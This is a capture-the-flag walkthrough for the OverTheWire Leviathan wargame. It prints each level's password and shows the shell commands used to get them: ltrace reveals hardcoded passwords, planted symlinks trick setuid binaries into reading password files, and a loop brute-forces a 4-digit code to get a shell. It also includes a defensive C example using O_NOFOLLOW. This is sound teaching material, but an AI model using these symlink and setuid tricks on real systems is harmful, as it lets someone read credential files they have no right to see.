OverTheWire - Leviathan

leviathan.labs.overthewire.org 2223

level 0 → level 1

leviathan0@leviathan:~/.backup$ cat bookmarks.html | grep pass
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is 3QJ3TgzHDq" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>
3QJ3TgzHDq

level 1 → level 2

leviathan1@leviathan:~$ strings check
td8
secr
love
password:
/bin/sh
Wrong password, Good Bye ...

leviathan1@leviathan:~$ ltrace ./check
__libc_start_main(0x80490ed, 1, 0xffffdb84, 0 <unfinished ...>
printf("password: ") = 10
getchar(0, 0, 0x786573, 0x646f67password: asd
) = 97
getchar(0, 97, 0x786573, 0x646f67) = 115
getchar(0, 0x7361, 0x786573, 0x646f67) = 100
strcmp("asd", "sex") = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
) = 29
+++ exited (status 0) +++

password: sex

$ cat /etc/leviathan_pass/leviathan2
NsN1HwFoyN

level 2 → level 3

leviathan2 has a setuid binary, printfile, that prints files, but it mishandles spaces: if a filename contains a space, it runs /bin/cat on each part separately. Create a file whose name contains a space ('t tmp') and a symlink named after the second part (tmp) that points to /etc/leviathan_pass/leviathan3. Running printfile on 't tmp' then makes /bin/cat read the symlink target.

leviathan2@leviathan:/tmp/tmp.YL8H9pOSiq$ ls -la
total 1360
drwxrwxrwx 2 leviathan2 leviathan2 4096 Aug 7 12:42 .
drwxrwx-wt 7322 root root 1384448 Aug 7 12:43 ..
lrwxrwxrwx 1 leviathan2 leviathan2 30 Aug 7 12:42 tmp -> /etc/leviathan_pass/leviathan3
-rw-rw-r-- 1 leviathan2 leviathan2 0 Aug 7 12:42 t tmp

leviathan2@leviathan:/tmp/tmp.YL8H9pOSiq$ ~/printfile 't tmp'
/bin/cat: t: No such file or directory
f0n8h2iWLP

level 3 → level 4

leviathan3@leviathan:~$ ltrace ./level3
__libc_start_main(0x80490ed, 1, 0xffffdb84, 0 <unfinished ...>
strcmp("h0no33", "kakaka") = -1
printf("Enter the password> ") = 20
fgets(Enter the password> asd
"asd\n", 256, 0xf7fab5c0) = 0xffffd95c
strcmp("asd\n", "snlprintf\n") = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
) = 19
+++ exited (status 0) +++

password: snlprintf

leviathan4@leviathan:~$ cat /etc/leviathan_pass/leviathan4
WG1egElCvO

level 4 → level 5

The binary bin in the .trash directory reads the password file and prints each byte as a group of eight ASCII 0s and 1s. Decode the groups back to ASCII characters.

leviathan4@leviathan:~/.trash$ ./bin
00110000 01100100 01111001 01111000 01010100 00110111 01000110 00110100 01010001 01000100 00001010

# Decode binary to ASCII
leviathan4@leviathan:~/.trash$ ./bin | python3 -c "import sys; print(''.join(chr(int(b,2)) for b in sys.stdin.read().strip().split()))"
0dyxT7F4QD

level 5 → level 6

The leviathan5 binary prints the contents of /tmp/file.log and follows symlinks. Create a symlink at that path pointing to the password file.

leviathan5@leviathan:~$ ./leviathan5
Cannot find /tmp/file.log

leviathan5@leviathan:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@leviathan:~$ ./leviathan5
szo7HDB88w
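
The level 2 and level 5 binaries both print a file the caller was not meant to read: one because the name is split on a space before /bin/cat sees it, the other because a symlink at /tmp/file.log is followed. As an added example (not code from the game or from this write-up), here is a file printer that avoids both by handing the name to open() as one string with O_NOFOLLOW; the function names, fixture files and their contents are constructed for the demonstration.

```c
#define _GNU_SOURCE                 /* O_NOFOLLOW, mkdtemp */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Copy one regular file to out_fd; returns bytes copied or -1.
 * The name goes to open() as a single string (no shell re-splits it on
 * spaces) and O_NOFOLLOW refuses a symlink as the final path component. */
long print_file(const char *path, int out_fd) {
    char buf[4096];
    long total = 0;
    ssize_t n = -1;                 /* stays -1 unless the checks below pass */
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;          /* ELOOP when path is a symlink */
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode)) {  /* check the opened object */
        while ((n = read(fd, buf, sizeof buf)) > 0) {
            if (write(out_fd, buf, (size_t)n) != n) { n = -1; break; }
            total += n;
        }
    }
    close(fd);
    return n < 0 ? -1 : total;
}

static int put(const char *name, const char *text) {
    FILE *f = fopen(name, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Constructed fixture: "secret" stands in for the password file. */
int make_fixture(char *dir_template) {
    if (!mkdtemp(dir_template) || chdir(dir_template) != 0) return -1;
    if (put("secret", "SECRET\n") || put("t tmp", "mine\n")) return -1;
    return (symlink("secret", "tmp") || symlink("secret", "file.log")) ? -1 : 0;
}

int main(void) {
    char dir[] = "/tmp/printfile-demo-XXXXXX";
    if (make_fixture(dir) != 0) return 1;
    long a = print_file("t tmp", STDOUT_FILENO);     /* prints "mine" only */
    long b = print_file("file.log", STDOUT_FILENO);  /* symlink: refused */
    printf("'t tmp' -> %ld, file.log -> %ld\n", a, b);
    return 0;
}
```

A setuid helper would additionally perform the open under the caller's real UID, so that the kernel's permission check applies to the same descriptor that is then read.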

level 6 → level 7

The leviathan6 binary takes a 4-digit code as its argument. The code space is small enough to brute-force with a shell loop; the correct value spawns a shell running as leviathan7.

leviathan6@leviathan:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>

leviathan6@leviathan:~$ for i in $(seq 1000 9999); do ./leviathan6 $i 2>/dev/null | grep -v Wrong; done

$ id
uid=12007(leviathan7) gid=12006(leviathan6) groups=12006(leviathan6)
$ bash
leviathan7@leviathan:~$ cat /etc/leviathan_pass/leviathan7
qEs5Io5yM8

level 7

leviathan7@leviathan:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.
(Please don't post writeups, solutions or spoilers about the game on the web. Thank you!)